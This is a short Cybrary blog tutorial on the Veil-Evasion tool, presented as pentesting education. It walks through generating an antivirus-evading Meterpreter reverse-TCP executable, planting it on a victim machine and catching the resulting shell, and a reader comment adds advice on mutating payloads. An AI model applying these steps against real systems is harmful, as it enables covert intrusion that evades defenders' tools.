Antivirus Evading Payloads: An Introduction to Veil-Evasion

February 2, 2017 | Views: 9056

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Estimated reading time: 2 minutes

Hi All,

The following article is intended as a brief introduction to the Veil-Evasion tool. This is part of the Veil-Framework was created by Chris Truncer. The Evasion tool is used to generate a range of different payloads with the ability to circumvent standard endpoint antivirus. Similar to polymorphic malware, Veil-Evasion creates a unique payload for which no signature should exist and can, therefore evade anti-virus. This gives it a distinct advantage over other payload generators. The following example provides a brief overview of generating a payload.

* Vail-Evasion is available from; https://github.com/Veil-Framework/Veil-Evasion *

Step 1. Once installed on Kali launch Veil-Evasion by running Veil-Evasion.py”.

Image 1

Step 2. Select a payload by entering its associated number (use “list” to view all options).

Image 2

For this example, option 6 [ c/meterpreter/rev_tcp ] was used.

Step 3. Configure the payload with the appropriate parameters (the CLI is similar to Metasploit).

Image 3

To view the configuration use “info”.

Step 4. Generate the payload using “generate” and pressing enter. You will then be prompted to name the output.

Image 4.1

The tool will then provide a summary of the payload you have generated.

Image 4.2

Step 5. Concurrently prepare a Meterpreter session for incoming connections using the appropriate information.

Image 5

Step 6. Deliver the payload contained in “usr/share/veil-output/compiled” per your chosen attack vector. For this example, Cybrary_example was simply copied onto the victim machine’s desktop. The below screenshot shows a scan using Windows Defender that detected nothing malicious in the payload.

Image 6

Step 7. Once the malicious .exe is run by the victim a reverse shell from the TOE is established with the attacking machine.The Meterpreter session then provides a beachhead for launching further exploits.

Image 7

The above example shows how easily an effective malicious payload can be generated using Veil-Evasion. I strongly recommend investigating the tool for yourself. There is an extensive range of payloads and functions available that this article only touches on. Once more it is worth noting Veil-Evasion’s biggest strength, is the ability to circumvent anti-virus software. Coupled with a good delivery mechanism Veil-Evasion is a worthy edition to any PenTester’s arsenal. I hope you found this article informative and thank you for reading. This is my first post so any constructive criticism or comments are welcome.

This article is intended purely for academic purposes. Neither the author nor Cybrary endorses or takes responsibility for the malicious use of the Veil-Framework. 

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
8 Comments
  1. All,

    if the traditional AV are detecting your created payload. You need to mutate the payload and it can by pass the traditionally by pass. I am not sure if there’s a free version out there to play around with.

    Hope this helps!!

    thanks

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel